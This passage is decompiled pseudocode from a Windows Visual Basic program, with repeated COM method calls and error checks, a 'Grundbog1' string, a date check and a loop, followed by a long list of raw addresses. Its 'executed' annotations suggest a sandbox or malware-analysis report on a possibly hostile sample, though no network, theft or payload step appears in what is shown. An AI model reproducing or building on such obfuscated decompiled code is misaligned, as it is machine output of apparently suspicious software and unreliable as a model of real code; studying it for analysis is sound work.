						_v896 = 0x425010;
					}
					_t2136 =  &_v236;
					L004017C4();
					_v500 = _t2136;
					_t2140 =  *((intOrPtr*)( *_v500 + 0x140))(_v500,  &_v224, _t2136,  *((intOrPtr*)( *((intOrPtr*)( *_v896)) + 0x308))( *_v896));
					asm("fclex");
					_v504 = _t2140;
					if(_v504 >= 0) {
						_v900 = _v900 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v900 = _t2140;
					}
					_push(0x26);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3e;
					if( *0x425010 != 0) {
						_v904 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v904 = 0x425010;
					}
					_t2144 =  &_v236;
					L004017C4();
					_v500 = _t2144;
					_t2148 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2144,  *((intOrPtr*)( *((intOrPtr*)( *_v904)) + 0x308))( *_v904));
					asm("fclex");
					_v504 = _t2148;
					if(_v504 >= 0) {
						_v908 = _v908 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v908 = _t2148;
					}
					_push(0x27);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3f;
					_push(0x28);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x40;
					if( *0x425010 != 0) {
						_v912 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v912 = 0x425010;
					}
					_t2152 =  &_v236;
					L004017C4();
					_v500 = _t2152;
					_t2156 =  *((intOrPtr*)( *_v500 + 0x218))(_v500,  &_v224, _t2152,  *((intOrPtr*)( *((intOrPtr*)( *_v912)) + 0x30c))( *_v912));
					asm("fclex");
					_v504 = _t2156;
					if(_v504 >= 0) {
						_v916 = _v916 & 0x00000000;
					} else {
						_push(0x218);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v916 = _t2156;
					}
					_push(0x29);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x41;
					if( *0x425010 != 0) {
						_v920 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v920 = 0x425010;
					}
					_t2160 =  &_v236;
					L004017C4();
					_v500 = _t2160;
					_t2164 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2160,  *((intOrPtr*)( *((intOrPtr*)( *_v920)) + 0x308))( *_v920));
					asm("fclex");
					_v504 = _t2164;
					if(_v504 >= 0) {
						_v924 = _v924 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v924 = _t2164;
					}
					_push(0x2a);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x42;
					if( *0x425010 != 0) {
						_v928 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v928 = 0x425010;
					}
					_t2168 =  &_v236;
					L004017C4();
					_v500 = _t2168;
					_t2172 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2168,  *((intOrPtr*)( *((intOrPtr*)( *_v928)) + 0x308))( *_v928));
					asm("fclex");
					_v504 = _t2172;
					if(_v504 >= 0) {
						_v932 = _v932 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v932 = _t2172;
					}
					_push(0x2b);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x43;
					if( *0x425010 != 0) {
						_v936 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v936 = 0x425010;
					}
					_t2176 =  &_v236;
					L004017C4();
					_v500 = _t2176;
					_t2180 =  *((intOrPtr*)( *_v500 + 0x140))(_v500,  &_v224, _t2176,  *((intOrPtr*)( *((intOrPtr*)( *_v936)) + 0x30c))( *_v936));
					asm("fclex");
					_v504 = _t2180;
					if(_v504 >= 0) {
						_v940 = _v940 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v940 = _t2180;
					}
					_push(0x2c);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x44;
					_push(0x2d);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x45;
					if( *0x425010 != 0) {
						_v944 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v944 = 0x425010;
					}
					_t2184 =  &_v236;
					L004017C4();
					_v500 = _t2184;
					_t2188 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2184,  *((intOrPtr*)( *((intOrPtr*)( *_v944)) + 0x30c))( *_v944));
					asm("fclex");
					_v504 = _t2188;
					if(_v504 >= 0) {
						_v948 = _v948 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v948 = _t2188;
					}
					_push(0x2e);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x46;
					if( *0x425010 != 0) {
						_v952 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v952 = 0x425010;
					}
					_t2192 =  &_v236;
					L004017C4();
					_v500 = _t2192;
					_t2196 =  *((intOrPtr*)( *_v500 + 0x120))(_v500,  &_v224, _t2192,  *((intOrPtr*)( *((intOrPtr*)( *_v952)) + 0x304))( *_v952));
					asm("fclex");
					_v504 = _t2196;
					if(_v504 >= 0) {
						_v956 = _v956 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v956 = _t2196;
					}
					_push(0x2f);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x47;
					_push(0x30);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x48;
					_push(0x31);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x49;
					_push(0x32);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x4a;
					if( *0x425010 != 0) {
						_v960 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v960 = 0x425010;
					}
					_t2200 =  &_v236;
					L004017C4();
					_v500 = _t2200;
					_t2204 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2200,  *((intOrPtr*)( *((intOrPtr*)( *_v960)) + 0x300))( *_v960));
					asm("fclex");
					_v504 = _t2204;
					if(_v504 >= 0) {
						_v964 = _v964 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405048);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v964 = _t2204;
					}
					_push(0x33);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x4b;
					_push(0x34);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x4c;
					_push(0x35);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x4d;
					if( *0x425010 != 0) {
						_v968 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v968 = 0x425010;
					}
					_t2208 =  &_v236;
					L004017C4();
					_v500 = _t2208;
					_t2212 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2208,  *((intOrPtr*)( *((intOrPtr*)( *_v968)) + 0x2fc))( *_v968));
					asm("fclex");
					_v504 = _t2212;
					if(_v504 >= 0) {
						_v972 = _v972 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4052ac);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v972 = _t2212;
					}
					_push(0x36);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x4e;
					if( *0x425010 != 0) {
						_v976 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v976 = 0x425010;
					}
					_t2216 =  &_v236;
					L004017C4();
					_v500 = _t2216;
					_t2220 =  *((intOrPtr*)( *_v500 + 0xa8))(_v500,  &_v224, _t2216,  *((intOrPtr*)( *((intOrPtr*)( *_v976)) + 0x308))( *_v976));
					asm("fclex");
					_v504 = _t2220;
					if(_v504 >= 0) {
						_v980 = _v980 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v980 = _t2220;
					}
					_push(0x37);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x4f;
					_push(0x38);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x50;
					_push(0x39);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x51;
					if( *0x425010 != 0) {
						_v984 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v984 = 0x425010;
					}
					_t2224 =  &_v236;
					L004017C4();
					_v500 = _t2224;
					_t2228 =  *((intOrPtr*)( *_v500 + 0x140))(_v500,  &_v224, _t2224,  *((intOrPtr*)( *((intOrPtr*)( *_v984)) + 0x30c))( *_v984));
					asm("fclex");
					_v504 = _t2228;
					if(_v504 >= 0) {
						_v988 = _v988 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v988 = _t2228;
					}
					_push(0x3a);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x52;
					_push(0x3b);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x53;
					_push(0x3c);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x54;
					_push(0x3d);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x55;
					if( *0x425010 != 0) {
						_v992 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v992 = 0x425010;
					}
					_t2232 =  &_v236;
					L004017C4();
					_v500 = _t2232;
					_t2236 =  *((intOrPtr*)( *_v500 + 0x180))(_v500,  &_v240, _t2232,  *((intOrPtr*)( *((intOrPtr*)( *_v992)) + 0x304))( *_v992));
					asm("fclex");
					_v504 = _t2236;
					if(_v504 >= 0) {
						_v996 = _v996 & 0x00000000;
					} else {
						_push(0x180);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v996 = _t2236;
					}
					_push(0);
					_push(0);
					_push(_v240);
					_t2237 =  &_v276;
					_push(_t2237);
					L004017CA();
					_push(_t2237);
					L00401728();
					L00401752();
					_push(0x3e);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					_push( &_v240);
					_push( &_v236);
					_push(2);
					L004017A6();
					_t2811 = _t2818 + 0x1c;
					L00401794();
					_v8 = 0x56;
					_push(0x3f);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x57;
					if( *0x425010 != 0) {
						_v1000 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v1000 = 0x425010;
					}
					_t2243 =  &_v236;
					L004017C4();
					_v500 = _t2243;
					_t2247 =  *((intOrPtr*)( *_v500 + 0xa8))(_v500,  &_v224, _t2243,  *((intOrPtr*)( *((intOrPtr*)( *_v1000)) + 0x308))( *_v1000));
					asm("fclex");
					_v504 = _t2247;
					if(_v504 >= 0) {
						_v1004 = _v1004 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1004 = _t2247;
					}
					_push(0x40);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x58;
					_push(0x41);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x59;
					_push(0x42);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x5a;
					_push(0x43);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x5b;
					_push(0x44);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x5c;
					_v8 = 0x5d;
					if( *0x425698 != 0) {
						_v1008 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v1008 = 0x425698;
					}
					_v500 =  *_v1008;
					_v400 = L"Grundbog1";
					_v408 = 8;
					_v384 = 0x93;
					_v392 = 2;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t2255 =  *((intOrPtr*)( *_v500 + 0x38))(_v500, 0x10, 0x10,  &_v276);
					asm("fclex");
					_v504 = _t2255;
					if(_v504 >= 0) {
						_v1012 = _v1012 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1012 = _t2255;
					}
					_push( &_v276);
					_push( &_v376);
					L0040171C();
					_push( &_v376);
					_push( &_v172);
					L00401722();
					L00401794();
				}
				_v8 = 0x5f;
				if( *0x425010 != 0) {
					_v1016 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v1016 = 0x425010;
				}
				_t1825 =  &_v236;
				L004017C4();
				_v500 = _t1825;
				_v384 = 1;
				_v392 = 2;
				L00401530();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1829 =  *((intOrPtr*)( *_v500 + 0x200))(_v500, 0x10, _t1825,  *((intOrPtr*)( *((intOrPtr*)( *_v1016)) + 0x304))( *_v1016));
				asm("fclex");
				_v504 = _t1829;
				if(_v504 >= 0) {
					_v1020 = _v1020 & 0x00000000;
				} else {
					_push(0x200);
					_push(0x405098);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v1020 = _t1829;
				}
				L0040178E();
				_v8 = 0x60;
				_v268 = 0x20;
				_v276 = 2;
				_t1830 =  &_v276;
				_push(_t1830);
				_push(1);
				L00401710();
				L00401752();
				_push(_t1830);
				_push(0x4054f4);
				L00401716();
				asm("sbb eax, eax");
				_v500 =  ~( ~( ~_t1830));
				L00401740();
				L00401794();
				if(_v500 != 0) {
					_v8 = 0x61;
					if( *0x425698 != 0) {
						_v1024 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v1024 = 0x425698;
					}
					_v500 =  *_v1024;
					_t1909 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t1909;
					if(_v504 >= 0) {
						_v1028 = _v1028 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1028 = _t1909;
					}
					_v508 = _v236;
					_t1914 =  *((intOrPtr*)( *_v508 + 0xf8))(_v508,  &_v224);
					asm("fclex");
					_v512 = _t1914;
					if(_v512 >= 0) {
						_v1032 = _v1032 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x4050a8);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v1032 = _t1914;
					}
					_v592 = _v224;
					_v224 = _v224 & 0x00000000;
					L00401752();
					L0040178E();
					_v8 = 0x62;
					if( *0x425698 != 0) {
						_v1036 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v1036 = 0x425698;
					}
					_v500 =  *_v1036;
					_t1921 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t1921;
					if(_v504 >= 0) {
						_v1040 = _v1040 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1040 = _t1921;
					}
					_v508 = _v236;
					_t1926 =  *((intOrPtr*)( *_v508 + 0x130))(_v508,  &_v224);
					asm("fclex");
					_v512 = _t1926;
					if(_v512 >= 0) {
						_v1044 = _v1044 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x4050a8);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v1044 = _t1926;
					}
					_v596 = _v224;
					_v224 = _v224 & 0x00000000;
					L00401752();
					L0040178E();
					_v8 = 0x63;
					_v8 = 0x64;
					if( *0x425010 != 0) {
						_v1048 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v1048 = 0x425010;
					}
					_t1931 =  &_v236;
					L004017C4();
					_v500 = _t1931;
					_t1935 =  *((intOrPtr*)( *_v500 + 0x178))(_v500,  &_v240, _t1931,  *((intOrPtr*)( *((intOrPtr*)( *_v1048)) + 0x30c))( *_v1048));
					asm("fclex");
					_v504 = _t1935;
					if(_v504 >= 0) {
						_v1052 = _v1052 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1052 = _t1935;
					}
					_push(0);
					_push(0);
					_push(_v240);
					_push( &_v276);
					L004017CA();
					_t2813 = _t2811 + 0x10;
					if( *0x425010 != 0) {
						_v1056 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v1056 = 0x425010;
					}
					_t1940 =  &_v244;
					L004017C4();
					_v508 = _t1940;
					_t1944 =  *((intOrPtr*)( *_v508 + 0x48))(_v508,  &_v224, _t1940,  *((intOrPtr*)( *((intOrPtr*)( *_v1056)) + 0x304))( *_v1056));
					asm("fclex");
					_v512 = _t1944;
					if(_v512 >= 0) {
						_v1060 = _v1060 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405098);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v1060 = _t1944;
					}
					if( *0x425698 != 0) {
						_v1064 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v1064 = 0x425698;
					}
					_v516 =  *_v1064;
					_t1950 =  *((intOrPtr*)( *_v516 + 0x4c))(_v516,  &_v248);
					asm("fclex");
					_v520 = _t1950;
					if(_v520 >= 0) {
						_v1068 = _v1068 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x405068);
						_push(_v516);
						_push(_v520);
						L004017B8();
						_v1068 = _t1950;
					}
					_v524 = _v248;
					_t1953 =  &_v276;
					L00401728();
					L00401752();
					_t1956 =  *((intOrPtr*)( *_v524 + 0x24))(_v524, _t1953, _t1953, _v224,  &_v232);
					asm("fclex");
					_v528 = _t1956;
					if(_v528 >= 0) {
						_v1072 = _v1072 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x405088);
						_push(_v524);
						_push(_v528);
						L004017B8();
						_v1072 = _t1956;
					}
					_v600 = _v232;
					_v232 = _v232 & 0x00000000;
					L00401752();
					_push( &_v224);
					_push( &_v228);
					_push(2);
					L0040170A();
					_push( &_v248);
					_push( &_v240);
					_push( &_v244);
					_push( &_v236);
					_push(4);
					L004017A6();
					_t2811 = _t2813 + 0x20;
					L00401794();
				}
				_v8 = 0x66;
				_v384 = L"01/01/01";
				_v392 = 8;
				_t2643 =  &_v392;
				_t2370 =  &_v276;
				L004016F8();
				_push( &_v276);
				_push( &_v292); // executed
				L004016FE(); // executed
				_v400 = 0x7d1;
				_v408 = 0x8002;
				_push( &_v292);
				_t1838 =  &_v408;
				_push(_t1838);
				L00401704();
				_v500 = _t1838;
				_push( &_v292);
				_push( &_v276);
				_push(2);
				L004017A0();
				if(_v500 != 0) {
					_v8 = 0x67;
					_v268 = 0x80020004;
					_v276 = 0xa;
					_t1899 =  &_v276;
					L0040179A();
					_v212 = _t1899;
					L00401794();
					_v8 = 0x68;
					_v268 = 2;
					_v276 = 2;
					_t1900 =  &_v276;
					L004016F2();
					_t2643 = _t1900;
					L00401752();
					_t2370 =  &_v276;
					L00401794();
					_v8 = 0x69;
					_t1903 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x6621, _t1900, _t1899);
					asm("fclex");
					_v500 = _t1903;
					_t2947 = _v500;
					if(_t2947 >= 0) {
						_v1076 = _v1076 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x404af0);
						_push(_a4);
						_push(_v500);
						L004017B8();
						_v1076 = _t1903;
					}
				}
				_v8 = 0x6b;
				asm("fldz");
				_push(_t2370);
				_push(_t2370);
				_v364 = _t2951;
				L004016E6();
				L004016EC();
				asm("fcomp qword [0x401400]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t2947 != 0) {
					_v8 = 0x6c;
					_t1898 =  &_v276;
					_push(_t1898);
					L004016E0();
					_t2643 =  &_v276;
					L00401764();
					_v8 = 0x6d;
					_push(0xffffffff);
					L004016DA();
					_v8 = 0x6e;
					_v8 = 0x6f;
					_push(0xde);
					L00401788();
					_v64 = _t1898;
				}
				_v8 = 0x71;
				_t1844 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v500 = _t1844;
				if(_v500 >= 0) {
					_v1080 = _v1080 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x404b20);
					_push(_a4);
					_push(_v500);
					L004017B8();
					_v1080 = _t1844;
				}
				_v8 = 0x72;
				 *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v480);
				_v100 = _v480;
				_v8 = 0x73;
				_v496 = 0x71c81fd0;
				_v492 = 0x5af8;
				 *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v496, 0x4daa7940, 0x5b02);
				_v8 = 0x74;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4);
				_v8 = 0x75;
				_t1858 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4);
				_v500 = _t1858;
				if(_v500 >= 0) {
					_v1084 = _v1084 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x404b20);
					_push(_a4);
					_push(_v500);
					L004017B8();
					_v1084 = _t1858;
				}
				_v8 = 0x76;
				_v384 = 1;
				_v392 = 2;
				_v400 = 0xa10f;
				_v408 = 3;
				_v416 = _v416 & 0x00000000;
				_v424 = 2;
				_push( &_v392);
				_push( &_v408);
				_push( &_v424);
				_push( &_v564);
				_push( &_v548);
				_t1864 =  &_v52;
				_push(_t1864);
				L004016D4();
				_v604 = _t1864;
				while(_v604 != 0) {
					_v8 = 0x77;
					 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v480);
					_v208 = _v480;
					_v8 = 0x78;
					 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v476);
					_v204 = _v476;
					_v8 = 0x79;
					_t1877 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v480);
					_v500 = _t1877;
					if(_v500 >= 0) {
						_v1088 = _v1088 & 0x00000000;
					} else {
						_push(0x700);
						_push(0x404b20);
						_push(_a4);
						_push(_v500);
						L004017B8();
						_v1088 = _t1877;
					}
					_v200 = _v480;
					_v8 = 0x7a;
					 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v480);
					_v92 = _v480;
					_v8 = 0x7b;
					if( *0x425010 != 0) {
						_v1092 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v1092 = 0x425010;
					}
					_t1886 =  &_v236;
					L004017C4();
					_v500 = _t1886;
					_t1890 =  *((intOrPtr*)( *_v500 + 0x190))(_v500,  &_v224, _t1886,  *((intOrPtr*)( *((intOrPtr*)( *_v1092)) + 0x304))( *_v1092));
					asm("fclex");
					_v504 = _t1890;
					if(_v504 >= 0) {
						_v1096 = _v1096 & 0x00000000;
					} else {
						_push(0x190);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1096 = _t1890;
					}
					_v496 =  *0x4013f8;
					 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v496, _v224);
					L00401740();
					L0040178E();
					_v8 = 0x7c;
					_push( &_v564);
					_push( &_v548);
					_t1897 =  &_v52;
					_push(_t1897);
					L004016CE();
					_v604 = _t1897;
				}
				_v8 = 0x7d;
				_v384 = 0xaa47e;
				_t2644 =  >=  ? 0x4106af : _t2643;
				_push( >=  ? 0x4106af : _t2643);
				goto ( *__esp);
			}

0x00414276
0x00414282
0x0041428a
0x0041428d
0x0041429a
0x004142a2
0x004142a5
0x004142b4
0x004142b7
0x004142be
0x004142cc
0x004142e9
0x004142ce
0x004142ce
0x004142d3
0x004142d8
0x004142dd
0x004142dd
0x0041430d
0x00414314
0x00414319
0x00414334
0x0041433a
0x0041433c
0x00414349
0x0041436e
0x0041434b
0x0041434b
0x00414350
0x00414355
0x0041435b
0x00414361
0x00414366
0x00414366
0x00414375
0x00414377
0x00414379
0x00414385
0x00414386
0x0041438b
0x00414395
0x004143b2
0x00414397
0x00414397
0x0041439c
0x004143a1
0x004143a6
0x004143a6
0x004143d6
0x004143dd
0x004143e2
0x004143fd
0x00414403
0x00414405
0x00414412
0x00414437
0x00414414
0x00414414
0x00414419
0x0041441e
0x00414424
0x0041442a
0x0041442f
0x0041442f
0x0041443e
0x00414440
0x00414442
0x0041444e
0x0041444f
0x00414454
0x0041445e
0x0041447b
0x00414460
0x00414460
0x00414465
0x0041446a
0x0041446f
0x0041446f
0x0041449f
0x004144a6
0x004144ab
0x004144c6
0x004144cc
0x004144ce
0x004144db
0x00414500
0x004144dd
0x004144dd
0x004144e2
0x004144e7
0x004144ed
0x004144f3
0x004144f8
0x004144f8
0x00414507
0x00414509
0x0041450b
0x00414511
0x00414517
0x00414518
0x0041451d
0x00414520
0x00414521
0x00414526
0x00414527
0x0041452d
0x0041452e
0x00414533
0x00414534
0x0041453a
0x0041453b
0x00414540
0x00414541
0x00414546
0x0041454c
0x00414558
0x00414575
0x0041455a
0x0041455a
0x0041455f
0x00414564
0x00414569
0x00414569
0x00414599
0x004145a0
0x004145a5
0x004145c0
0x004145c3
0x004145c5
0x004145d2
0x004145f4
0x004145d4
0x004145d4
0x004145d6
0x004145db
0x004145e1
0x004145e7
0x004145ec
0x004145ec
0x00414609
0x0041460e
0x0041461b
0x00414622
0x00414629
0x00414630
0x00414637
0x0041463e
0x00414645
0x00414646
0x00414648
0x00414656
0x0041465d
0x00414664
0x00414665
0x00414667
0x0041466c
0x00414678
0x0041467e
0x00414685
0x0041468f
0x00414699
0x0041469f
0x004146a0
0x004146a5
0x004146b2
0x004146b7
0x004146c5
0x004146e2
0x004146c7
0x004146c7
0x004146cc
0x004146d1
0x004146d6
0x004146d6
0x004146f4
0x0041470f
0x00414712
0x00414714
0x00414721
0x00414743
0x00414723
0x00414723
0x00414725
0x0041472a
0x00414730
0x00414736
0x0041473b
0x0041473b
0x00414750
0x00414764
0x00414767
0x00414769
0x00414776
0x00414798
0x00414778
0x00414778
0x0041477a
0x0041477f
0x00414785
0x0041478b
0x00414790
0x00414790
0x004147a5
0x004147aa
0x004147b1
0x004147b8
0x004147ba
0x004147bf
0x004147bf
0x004147c2
0x004147d0
0x004147ed
0x004147d2
0x004147d2
0x004147d7
0x004147dc
0x004147e1
0x004147e1
0x00414811
0x00414818
0x0041481d
0x00414838
0x0041483e
0x00414840
0x0041484d
0x00414872
0x0041484f
0x0041484f
0x00414854
0x00414859
0x0041485f
0x00414865
0x0041486a
0x0041486a
0x00414880
0x0041489d
0x00414882
0x00414882
0x00414887
0x0041488c
0x00414891
0x00414891
0x004148c1
0x004148c8
0x004148cd
0x004148e8
0x004148ee
0x004148f0
0x004148fd
0x00414922
0x004148ff
0x004148ff
0x00414904
0x00414909
0x0041490f
0x00414915
0x0041491a
0x0041491a
0x00414929
0x0041492b
0x0041492d
0x00414939
0x0041493a
0x0041493f
0x00414949
0x00414966
0x0041494b
0x0041494b
0x00414950
0x00414955
0x0041495a
0x0041495a
0x0041498a
0x00414991
0x00414996
0x004149b1
0x004149b7
0x004149b9
0x004149c6
0x004149eb
0x004149c8
0x004149c8
0x004149cd
0x004149d2
0x004149d8
0x004149de
0x004149e3
0x004149e3
0x004149f2
0x004149f4
0x004149f6
0x00414a02
0x00414a03
0x00414a08
0x00414a12
0x00414a2f
0x00414a14
0x00414a14
0x00414a19
0x00414a1e
0x00414a23
0x00414a23
0x00414a53
0x00414a5a
0x00414a5f
0x00414a7a
0x00414a80
0x00414a82
0x00414a8f
0x00414ab4
0x00414a91
0x00414a91
0x00414a96
0x00414a9b
0x00414aa1
0x00414aa7
0x00414aac
0x00414aac
0x00414ac1
0x00414ac2
0x00414ace
0x00414ad2
0x00414ad3
0x00414ad9
0x00414ada
0x00414adf
0x00414ae0
0x00414ae6
0x00414ae7
0x00414aec
0x00414aed
0x00414af3
0x00414af8
0x00414afe
0x00414b14
0x00414b21
0x00414b28
0x00414b2f
0x00414b36
0x00414b3d
0x00414b44
0x00414b45
0x00414b47
0x00414b55
0x00414b5c
0x00414b5d
0x00414b5f
0x00414b64
0x00414b70
0x00414b76
0x00414b84
0x00414ba1
0x00414b86
0x00414b86
0x00414b8b
0x00414b90
0x00414b95
0x00414b95
0x00414bb3
0x00414bce
0x00414bd1
0x00414bd3
0x00414be0
0x00414c02
0x00414be2
0x00414be2
0x00414be4
0x00414be9
0x00414bef
0x00414bf5
0x00414bfa
0x00414bfa
0x00414c0f
0x00414c2a
0x00414c2d
0x00414c2f
0x00414c3c
0x00414c5e
0x00414c3e
0x00414c3e
0x00414c40
0x00414c45
0x00414c4b
0x00414c51
0x00414c56
0x00414c56
0x00414c6c
0x00414c76
0x00414c7b
0x00414c89
0x00414ca6
0x00414c8b
0x00414c8b
0x00414c90
0x00414c95
0x00414c9a
0x00414c9a
0x00414cb8
0x00414cd3
0x00414cd6
0x00414cd8
0x00414ce5
0x00414d07
0x00414ce7
0x00414ce7
0x00414ce9
0x00414cee
0x00414cf4
0x00414cfa
0x00414cff
0x00414cff
0x00414d14
0x00414d2f
0x00414d35
0x00414d37
0x00414d44
0x00414d69
0x00414d46
